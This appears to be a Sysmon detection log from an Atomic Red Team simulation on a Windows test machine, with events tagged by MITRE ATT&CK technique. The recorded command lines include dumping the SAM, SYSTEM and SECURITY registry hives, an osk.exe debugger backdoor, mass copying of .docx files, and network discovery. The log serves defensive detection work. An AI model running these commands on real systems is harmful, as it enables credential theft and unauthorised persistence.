SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547802.194097,2019-07-19T18:50:02.194097+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," 1 5 4 1 0 0x8000000000000000 3729 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:50:02.144 747F3D96-D89A-5D31-0000-0010A46B3200 1228 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547802.174886,2019-07-19T18:50:02.174886+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3728 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:52.263 747F3D96-D890-5D31-0000-001085443200 4316 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547792.275626,2019-07-19T18:49:52.275626+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "for /R c: %%f in (*.docx) do copy %%f c:\temp\" ),1," 1 5 4 1 0 0x8000000000000000 3727 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:52.202 747F3D96-D890-5D31-0000-0010FA3F3200 1568 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "for /R c: %%f in (*.docx) do copy %%f c:\temp\" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547792.053916,2019-07-19T18:49:52.053916+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /S /D /c" dir c: /b /s .docx " ),1," 1 5 4 1 0 0x8000000000000000 3725 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:52.011 747F3D96-D890-5D31-0000-001012383200 608 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\system32\cmd.exe /S /D /c" dir c: /b /s .docx " C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D88F-5D31-0000-0010BD353200 2780 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "dir c: /b /s .docx | findstr /e .docx" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547792.048002,2019-07-19T18:49:52.048002+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "dir c: /b /s .docx | findstr /e .docx" ),1," 1 5 4 1 0 0x8000000000000000 3724 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:51.971 747F3D96-D88F-5D31-0000-0010BD353200 2780 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "dir c: /b /s .docx | findstr /e .docx" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547791.99625,2019-07-19T18:49:51.996250+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3723 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:43.520 747F3D96-D887-5D31-0000-0010D51F3200 752 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547781.691049,2019-07-19T18:49:41.691049+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\SAM sam.hive" ),1," 1 5 4 1 0 0x8000000000000000 3721 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:41.646 747F3D96-D885-5D31-0000-00107F1A3200 2832 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg save HKLM\SAM sam.hive" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547779.255338,2019-07-19T18:49:39.255338+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\System system.hive" ),1," 1 5 4 1 0 0x8000000000000000 3719 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:39.214 747F3D96-D883-5D31-0000-0010839B3100 3904 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg save HKLM\System system.hive" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547773.63255,2019-07-19T18:49:33.632550+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\Security security.hive" ),1," 1 5 4 1 0 0x8000000000000000 3717 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:33.603 747F3D96-D87D-5D31-0000-0010958F3100 1728 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg save HKLM\Security security.hive" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547773.572021,2019-07-19T18:49:33.572021+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run" ),1," 1 5 4 1 0 0x8000000000000000 3715 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:33.541 747F3D96-D87D-5D31-0000-0010FA8A3100 3868 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547773.392501,2019-07-19T18:49:33.392501+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" ),1," 1 5 4 1 0 0x8000000000000000 3713 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:33.365 747F3D96-D87D-5D31-0000-0010CA843100 3900 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547773.331942,2019-07-19T18:49:33.331942+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" ),1," 1 5 4 1 0 0x8000000000000000 3711 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:33.284 747F3D96-D87D-5D31-0000-00103B803100 324 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547773.251689,2019-07-19T18:49:33.251689+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" ),1," 1 5 4 1 0 0x8000000000000000 3709 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:33.209 747F3D96-D87D-5D31-0000-0010B37B3100 3616 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547773.175813,2019-07-19T18:49:33.175813+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run" ),1," 1 5 4 1 0 0x8000000000000000 3707 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:33.113 747F3D96-D87D-5D31-0000-00102B773100 2148 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547773.059631,2019-07-19T18:49:33.059631+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run" ),1," 1 5 4 1 0 0x8000000000000000 3705 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:33.019 747F3D96-D87D-5D31-0000-001090723100 196 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547772.990533,2019-07-19T18:49:32.990533+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx" ),1," 1 5 4 1 0 0x8000000000000000 3703 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:32.956 747F3D96-D87C-5D31-0000-0010056E3100 4220 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547772.937862,2019-07-19T18:49:32.937862+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" ),1," 1 5 4 1 0 0x8000000000000000 3701 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:32.900 747F3D96-D87C-5D31-0000-00107C693100 1740 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547772.868916,2019-07-19T18:49:32.868916+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad" ),1," 1 5 4 1 0 0x8000000000000000 3699 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:32.842 747F3D96-D87C-5D31-0000-0010E1643100 5936 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547772.807707,2019-07-19T18:49:32.807707+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" ),1," 1 5 4 1 0 0x8000000000000000 3697 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:49:32.775 747F3D96-D87C-5D31-0000-001056603100 6832 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547895.038554,2019-07-19T18:51:35.038554+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i" )",1," 1 5 4 1 0 0x8000000000000000 3773 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:51:34.991 747F3D96-D8F6-5D31-0000-001091D13300 4528 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c "for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i" C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1563547895.01476,2019-07-19T18:51:35.014760+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," 1 5 4 1 0 0x8000000000000000 3772 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:51:34.779 747F3D96-D8F6-5D31-0000-00100FCB3300 3344 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\system32\cmd.exe" /c C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-D6F7-5D31-0000-00104ACE2500 3912 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1077] Windows Admin Shares - Process - Created,1563547894.797834,2019-07-19T18:51:34.797834+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view ),1," 1 5 4 1 0 0x8000000000000000 3771 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:51:22.330 747F3D96-D8EA-5D31-0000-00108AB83300 4684 C:\Windows\System32\net.exe 10.0.17763.1 (WinBuild.160101.0800) Net Command Microsoft® Windows® Operating System Microsoft Corporation net view C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 747F3D96-D8EA-5D31-0000-001030B63300 1988 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "net view" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1018] Remote System Discovery - Process,1563547894.797834,2019-07-19T18:51:34.797834+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\net.exe ) through command line ( net view ),1," 1 5 4 1 0 0x8000000000000000 3771 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-19 14:51:22.330 747F3D96-D8EA-5D31-0000-00108AB83300 4684 C:\Windows\System32\net.exe 10.0.17763.1 (WinBuild.160101.0800) Net Command Microsoft® Windows® Operating System Microsoft Corporation net view C:\AtomicRedTeam\ MSEDGEWIN10\IEUser 747F3D96-D4B4-5D31-0000-002051090500 0x50951 1 High 